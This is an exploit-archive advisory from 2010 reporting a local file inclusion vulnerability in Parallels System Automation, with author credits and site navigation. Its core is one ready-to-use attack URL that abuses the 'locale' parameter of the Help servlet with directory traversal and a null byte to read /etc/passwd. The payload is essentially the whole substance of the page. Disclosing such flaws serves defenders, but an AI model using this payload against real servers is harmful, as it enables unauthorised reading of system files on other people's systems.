Parallels System Automation (PSA) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Parallels System Automation (PSA) Local File Inclusion Vulnerability
# Published : 2010-06-11
# Author : Pouya Daneshmand
# Previous Title : ardeaCore 2.2 Remote File Inclusion Vulnerability
# Next Title : DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit

#################################################################
# Application Info:
# Name: Parallels System Automation (PSA)
# Vendor: http://Parallels.com
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
https://cp.site.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.info
# Contacts: pouya@pouya.info
###################################################################
# Orginal Document:http://blog.pouya.info/userfiles/vul/PSA-LFI.pdf
###################################################################
# Securitylab.ir
###################################################################